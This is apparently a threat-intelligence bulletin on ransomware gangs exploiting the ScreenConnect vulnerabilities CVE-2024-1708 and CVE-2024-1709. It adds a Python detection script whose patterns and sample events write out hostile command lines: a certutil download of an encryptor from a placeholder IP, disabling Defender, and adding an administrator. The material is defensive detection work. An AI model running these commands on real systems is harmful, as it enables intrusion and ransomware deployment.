2024-03-07

More Ransomware Gangs Pounce on ScreenConnect Vulnerabilities

Level: Tactical  |  Source: Trend Micro  |  Global

Continued exploitation of the ScreenConnect vulnerabilities CVE-2024-1708 and CVE-2024-1709 adds to the critical need for immediate action, with attacks now observed from ransomware actors such as Black Basta and Bl00dy. Trend Micro's analysis outlines the attack chains the threat actors executed after exploiting these vulnerabilities, which affect ScreenConnect versions 23.9.7 and earlier: a path-traversal flaw (CVE-2024-1708) and an authentication bypass (CVE-2024-1709). Exploitation has resulted in both ransomware deployment and data theft. In one Black Basta intrusion examined by Trend Micro, the actors deployed Cobalt Strike beacons after exploiting these vulnerabilities.

Trend Micro researchers report that the attackers begin their intrusion by executing commands for reconnaissance, discovery, and privilege escalation, such as enumerating domain trusts and adding new users to the Administrators group. This methodical approach aims at pinpointing high-value targets and expanding the foothold within the compromised network. Illustrating the depth of that reconnaissance, researchers note the use of a script designed to "count the number of computers in the Active Directory environment that have logged on within the past 90 days, which is used to likely identify active targets for further exploitation or lateral movement within the network."

The deployment of Cobalt Strike payloads is not limited to Black Basta: other groups are also reported to use Cobalt Strike and to employ defense-evasion techniques such as disabling Windows Defender's real-time monitoring before downloading their malicious payload. The Bl00dy ransomware group, for its part, leveraged certutil and PowerShell to download and execute its ransomware encryptor.
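The behaviours above (domain-trust enumeration, adding users to Administrators, counting recently active AD computers, disabling Defender real-time monitoring, certutil/PowerShell downloads) are all visible in Windows process-creation telemetry. The following is an added example of detection logic, not code from Trend Micro or from the Anvilogic platform: it matches a handful of command-line patterns against constructed process-creation events and escalates hosts that show more than one behaviour, or any behaviour in a process spawned by a ScreenConnect binary. The specific command strings matched (`nltest /domain_trusts`, `net localgroup administrators ... /add`, `Get-ADComputer ... LastLogon`, `Set-MpPreference -DisableRealtimeMonitoring`, `certutil -urlcache`) are assumed common representatives of each behaviour, not the exact commands the report observed, and the parent-process check for `ScreenConnect.ClientService.exe` / `ScreenConnect.WindowsClient.exe` is likewise an assumption about how post-exploitation commands would appear.

```python
"""Added example: flag ScreenConnect post-exploitation behaviours in
process-creation events.  Patterns and sample events are constructed for
this example; they are not the commands or telemetry from the report."""
import re
from collections import defaultdict

# One entry per behaviour described in the summary.  Every pattern in the
# list must match (case-insensitively) for the rule to fire.  These command
# forms are assumed representatives of each behaviour, not observed IOCs.
RULES = {
    "domain_trust_enumeration": [r"\bnltest(\.exe)?\b", r"/domain_trusts"],
    "admin_group_add": [r'\bnet1?(\.exe)?\s+(localgroup|group)\s+"?administrators"?', r"/add\b"],
    "ad_recent_logon_enumeration": [r"\bGet-ADComputer\b", r"\bLastLogon"],
    "defender_realtime_disabled": [r"\bSet-MpPreference\b", r"-DisableRealtimeMonitoring\s+(\$true|1)\b"],
    "certutil_download": [r"\bcertutil(\.exe)?\b", r"-urlcache\b", r"https?://"],
    "powershell_download": [r"\bpowershell(\.exe)?\b",
                            r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"],
}

# Assumption: a shell or tool spawned directly by a ScreenConnect binary is
# the initial-access signal after the auth bypass.
SCREENCONNECT_IMAGES = ("screenconnect.clientservice.exe", "screenconnect.windowsclient.exe")

# Constructed sample telemetry (hosts, paths, IP and install id are made up).
SAMPLE_EVENTS = [
    {"host": "SRV01", "parent": r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe",
     "cmd": "cmd.exe /c nltest /domain_trusts"},
    {"host": "SRV01", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "net localgroup administrators svc_backup /add"},
    {"host": "SRV01", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": 'powershell.exe -c "Get-ADComputer -Filter {LastLogonDate -gt (Get-Date).AddDays(-90)} | Measure-Object"'},
    {"host": "WS17", "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "WS17", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "certutil.exe -urlcache -split -f http://203.0.113.10/enc.exe C:\\Users\\Public\\enc.exe"},
    # Routine admin activity that should not escalate: no LastLogon filter, no /add.
    {"host": "WS42", "parent": r"C:\Windows\explorer.exe",
     "cmd": 'powershell.exe -c "Get-ADComputer -Filter * | Measure-Object"'},
    {"host": "WS42", "parent": r"C:\Windows\System32\cmd.exe", "cmd": "net user"},
]


def match_rules(cmdline):
    """Return the names of every rule whose patterns all match the command line."""
    return [name for name, patterns in RULES.items()
            if all(re.search(p, cmdline, re.IGNORECASE) for p in patterns)]


def classify(event):
    """Rule hits for one event, plus a tag when the parent is a ScreenConnect binary."""
    tags = match_rules(event["cmd"])
    parent_image = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    if parent_image in SCREENCONNECT_IMAGES:
        tags.append("spawned_by_screenconnect")
    return tags


def triage(events, min_distinct=2):
    """Escalate a host when it shows >= min_distinct distinct behaviours, or any
    behaviour plus a ScreenConnect parent.  Single recon commands are left
    alone because they are common on legitimate admin hosts."""
    per_host = defaultdict(set)
    for ev in events:
        for tag in classify(ev):
            per_host[ev["host"]].add(tag)
    escalated = {}
    for host, tags in per_host.items():
        behaviours = tags - {"spawned_by_screenconnect"}
        if len(behaviours) >= min_distinct or (behaviours and "spawned_by_screenconnect" in tags):
            escalated[host] = sorted(tags)
    return escalated


if __name__ == "__main__":
    for host, tags in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(tags)}")
```

Run stand-alone, the script escalates SRV01 (trust enumeration spawned by ScreenConnect, admin-group addition, recent-logon enumeration) and WS17 (Defender disabled, certutil download) while leaving WS42's routine `Get-ADComputer` and `net user` commands unflagged. In production the same rules would be applied to Sysmon Event ID 1 or Security Event ID 4688 command lines, with the host-level grouping done over a time window rather than over a whole batch.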

Trend Micro researchers also identified the use of leaked builders from Conti and LockBit; the ransom note dropped, however, is distinct to the Bl00dy ransomware gang. Further analysis reveals the ScreenConnect vulnerabilities being exploited to deploy the XWorm malware, and the use of alternative remote management tools or additional instances of ScreenConnect to maintain access to and control over victim environments. Trend Micro's investigation adds urgency to taking the necessary actions to defend against these critical ScreenConnect vulnerabilities. Its findings complement earlier reporting from Huntress and Sophos: Huntress's telemetry revealed the deployment of LockBit ransomware, coin miners, SSH tunnels, and various remote monitoring and management tools, while Sophos corroborated the widespread deployment of LockBit ransomware and additionally noted the use of AsyncRAT, showing the range of threats these vulnerabilities expose systems to.
